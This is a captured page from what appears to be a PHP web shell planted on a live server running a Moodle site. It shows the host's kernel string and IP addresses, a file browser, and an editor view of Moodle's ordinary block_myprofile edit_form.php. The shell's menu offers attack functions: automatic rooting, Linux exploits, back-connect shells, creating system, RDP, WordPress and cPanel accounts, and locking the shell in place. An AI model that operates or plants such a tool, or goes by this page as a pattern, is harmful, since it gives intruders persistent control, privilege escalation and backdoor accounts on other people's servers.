Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.90
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
blocks /
myprofile /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
block_myprofile.php
3.79
KB
-rw-r--r--
edit_form.php
5.55
KB
-rw-r--r--
styles.css
481
B
-rw-r--r--
version.php
1.19
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_form.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. defined('MOODLE_INTERNAL') || die(); /** * Form for editing profile block settings * * @package block_myprofile * @copyright 2010 Remote-Learner.net * @author Olav Jordan <olav.jordan@remote-learner.ca> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class block_myprofile_edit_form extends block_edit_form { protected function specific_definition($mform) { global $CFG; $mform->addElement('header', 'configheader', get_string('myprofile_settings', 'block_myprofile')); $mform->addElement('selectyesno', 'config_display_picture', get_string('display_picture', 'block_myprofile')); if (isset($this->block->config->display_picture)) { $mform->setDefault('config_display_picture', $this->block->config->display_picture); } else { $mform->setDefault('config_display_picture', '1'); } $mform->addElement('selectyesno', 'config_display_country', get_string('display_country', 'block_myprofile')); if (isset($this->block->config->display_country)) { $mform->setDefault('config_display_country', $this->block->config->display_country); } else { $mform->setDefault('config_display_country', '1'); } $mform->addElement('selectyesno', 'config_display_city', get_string('display_city', 'block_myprofile')); if (isset($this->block->config->display_city)) { $mform->setDefault('config_display_city', $this->block->config->display_city); } else { $mform->setDefault('config_display_city', '1'); } $mform->addElement('selectyesno', 'config_display_email', get_string('display_email', 'block_myprofile')); if (isset($this->block->config->display_email)) { $mform->setDefault('config_display_email', $this->block->config->display_email); } else { $mform->setDefault('config_display_email', '1'); } $mform->addElement('selectyesno', 'config_display_phone1', get_string('display_phone1', 'block_myprofile')); if (isset($this->block->config->display_phone1)) { $mform->setDefault('config_display_phone1', $this->block->config->display_phone1); } else { $mform->setDefault('config_display_phone1', '0'); } $mform->addElement('selectyesno', 'config_display_phone2', get_string('display_phone2', 'block_myprofile')); if (isset($this->block->config->display_phone2)) { $mform->setDefault('config_display_phone2', $this->block->config->display_phone2); } else { $mform->setDefault('config_display_phone2', '0'); } $mform->addElement('selectyesno', 'config_display_institution', get_string('display_institution', 'block_myprofile')); if (isset($this->block->config->display_institution)) { $mform->setDefault('config_display_institution', $this->block->config->display_institution); } else { $mform->setDefault('config_display_institution', '0'); } $mform->addElement('selectyesno', 'config_display_address', get_string('display_address', 'block_myprofile')); if (isset($this->block->config->display_address)) { $mform->setDefault('config_display_address', $this->block->config->display_address); } else { $mform->setDefault('config_display_address', '0'); } $mform->addElement('selectyesno', 'config_display_firstaccess', get_string('display_firstaccess', 'block_myprofile')); if (isset($this->block->config->display_firstaccess)) { $mform->setDefault('config_display_firstaccess', $this->block->config->display_firstaccess); } else { $mform->setDefault('config_display_firstaccess', '0'); } $mform->addElement('selectyesno', 'config_display_lastaccess', get_string('display_lastaccess', 'block_myprofile')); if (isset($this->block->config->display_lastaccess)) { $mform->setDefault('config_display_lastaccess', $this->block->config->display_lastaccess); } else { $mform->setDefault('config_display_lastaccess', '0'); } $mform->addElement('selectyesno', 'config_display_currentlogin', get_string('display_currentlogin', 'block_myprofile')); if (isset($this->block->config->display_currentlogin)) { $mform->setDefault('config_display_currentlogin', $this->block->config->display_currentlogin); } else { $mform->setDefault('config_display_currentlogin', '0'); } $mform->addElement('selectyesno', 'config_display_lastip', get_string('display_lastip', 'block_myprofile')); if (isset($this->block->config->display_lastip)) { $mform->setDefault('config_display_lastip', $this->block->config->display_lastip); } else { $mform->setDefault('config_display_lastip', '0'); } } }
Close